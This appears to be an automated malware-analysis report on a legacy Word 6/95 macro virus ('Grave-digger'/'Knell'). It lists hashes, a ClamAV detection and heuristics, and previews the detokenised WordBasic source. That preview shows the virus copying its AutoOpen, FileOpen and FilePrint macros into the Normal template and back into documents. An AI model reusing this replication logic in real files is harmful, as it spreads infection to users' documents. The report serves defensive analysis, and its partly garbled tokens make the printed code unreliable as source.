Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dada0325bf9ab838…

MALICIOUS

Office (OLE)

7.0 KB First seen: 2012-06-14
MD5: 4bafb37e6c9ad35a1cbd6602a0bd0122 SHA-1: 1e95d5ccfc7614c0471cd4956b3cfb174b3f0ba3 SHA-256: dada0325bf9ab83850a08854b587f7062bc9ef2eb7824fcfed33f2055e9625e5
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy macro virus, specifically identified by 'RSN MACRO VIRUS Goat file' markers and historical creation details. The presence of WordBasic macro virus markers strongly suggests the use of Visual Basic for scripting, aligning with the T1059.005 MITRE ATT&CK technique. While no specific malicious actions are detailed beyond the historical context, the detection by ClamAV as Win.Trojan.Rats-2 indicates a known malicious signature.

Heuristics 3

  • ClamAV: Win.Trojan.Rats-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Rats-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 957 bytes
SHA-256: 3689b6d98c8d05e698882b81eaadfda2af4af943011242b8f29ce8fbbb59c2b0
Preview script
First 1,000 lines of the extracted script
+ 364 = @cmd6e65 =
MAIN
REM Grave-digger
MAIN
th = @cmd80f4 @cmd80f7
th 16 * fail
th
@cmdc011
@cmd8012 = @cmd8005 34 = ,   = @cmd8005 34 25625 dlg @cmd0058
dlg
dlg
@cmd0058 dlg
MAIN
thishour = @cmd80f4 @cmd80f7
thishour
thishour 13 * proiti
  8300
  8300
, - * fail
name$ = "Grave-digger"
name$
dlg @cmd0050
dlg
dlg
@cmd0050 dlg
k1 = 0
ic = @cmd80b7 1 , 0 , 0
i = 1 ic
ct$ = @cmd80b8 i , 1
ct$ = "Knell" k1 = 1
i
k1 = 1 * fail
@cmd0054 @cmd8025 , = 1
@cmd80c2 "Normal:AutoOp" , @cmd8025 = ":AutoOpen"
@cmd80c2 "Normal:Knell" , @cmd8025 = ":Knell"
@cmd80c2 "Normal:FileOpen" , @cmd8025 = ":Mutagen"
@cmd80c2 "Normal:FilePrint" , @cmd8025 = ":Zashib" 25625
MAIN
, - * fail
k = 0
j = @cmd80b7 0 , 0
i = 1 j
@cmd80b8 i , 0 , 0 = "Knell" k = 1
i
k = 1 * fail
@cmd80c2 @cmd8025 = ":AutoOpen" , "Normal:AutoOp"
@cmd80c2 @cmd8025 = ":Knell" , "Normal:Knell"
@cmd80c2 @cmd8025 = ":Mutagen" , "Normal:FileOpen"
@cmd80c2 @cmd8025 = ":Zashib" , "Normal:FilePrint" 25625

Open this report in the interactive analyzer, or submit your own file for analysis.